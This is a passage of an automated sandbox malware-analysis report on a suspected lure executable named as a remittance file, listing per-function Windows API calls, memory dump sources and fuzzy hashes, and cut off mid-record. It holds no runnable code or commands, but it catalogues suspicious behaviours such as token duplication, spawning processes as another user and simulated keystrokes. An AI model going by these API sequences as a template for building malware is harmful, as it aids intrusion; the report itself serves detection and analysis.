• Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
APIs
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
• Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
• Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
• Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
• Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
• Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
• Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
APIs
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: __lock_file
• String ID:
• API String ID: 3031932315-0
• Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
• Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
• Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
• Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 03EC2D5B
Memory Dump Source
• Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
• Instruction ID: 25616a6440ee407552b85bd05ae43e4c788f96683aa97142aa6feab1fc66e11d
• Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
• Instruction Fuzzy Hash: 59E08C30A25748EBCF20CBA8DA24AED7BB8D719720F004F98EA16C3290D6348A429714
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 03EC2D2B
Memory Dump Source
• Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
• Instruction ID: 3c80165e367caede41085d3b1261c65b41eb757656504d0a3fe156dfc0ce8a21
• Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
• Instruction Fuzzy Hash: F6D05E7091520CEBCB10CFA499049DE77A8D704321F008B58EE1587280D53199419750
APIs
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
• Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
• Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 03EC4721
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: c074e4ff606045c3fecc9a2b15844ec5e19ecb1e6939328782dd856f45b6da12
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: 47E0BF7598010DEFDB00EFE8D6496DE7BB4EF04301F1006A5FD05D7681DB309E648A62
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 03EC4721
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: 0e6a1a9cb6e5b4be39bbeff77b5a4e1db6434a93958868cd5e0d188b49445a0d
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: 04E0E67598010DDFDB00EFF8D64969E7FB4EF04301F1002A5FD01D2281D6309D608A62
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                      • SendMessageW.USER32 ref: 0047CA7F
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00AB18C0,00000000,00000000,00000000), ref: 0047CB9B
                                                                      • ImageList_BeginDrag.COMCTL32(00AB18C0,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                      • SetCapture.USER32(?), ref: 0047CBB6
                                                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                      • SendMessageW.USER32 ref: 0047CD12
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                      • SendMessageW.USER32 ref: 0047CD80
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                      • SendMessageW.USER32 ref: 0047CE93
                                                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,009B1B98,00000000,?,?,?,?), ref: 0047CF1C
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                      • SendMessageW.USER32 ref: 0047CF6B
                                                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,009B1B98,00000000,?,?,?,?), ref: 0047CFE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                      Strings
                                                                      Memory Dump Source
                                                                       • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3100379633-4164748364
                                                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00434420
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                      • IsIconic.USER32(?), ref: 0043444F
                                                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                      Strings
                                                                      Memory Dump Source
                                                                       • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 2889586943-2988720461
                                                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                      APIs
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                      • _wcslen.LIBCMT ref: 00446498
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • _wcsncpy.LIBCMT ref: 004464C0
                                                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                      • CloseDesktop.USER32(?), ref: 0044657A
                                                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                       • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                      • String ID: $@OH$default$winsta0
                                                                      • API String ID: 3324942560-3791954436
                                                                      • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                      • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                      APIs
                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
                                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                        • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • _wcscat.LIBCMT ref: 0044BD94
                                                                      • _wcscat.LIBCMT ref: 0044BDBD
                                                                      • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                      • _wcscpy.LIBCMT ref: 0044BE71
                                                                      • _wcscat.LIBCMT ref: 0044BE83
                                                                      • _wcscat.LIBCMT ref: 0044BE95
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                      • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                      • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                      • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                      • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                      Strings
                                                                      Memory Dump Source
                                                                       • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 2188072990-1173974218
                                                                      • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                      • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                      • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                      • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                      • __swprintf.LIBCMT ref: 004789D3
                                                                      • __swprintf.LIBCMT ref: 00478A1D
                                                                      • __swprintf.LIBCMT ref: 00478A4B
                                                                      • __swprintf.LIBCMT ref: 00478A79
                                                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
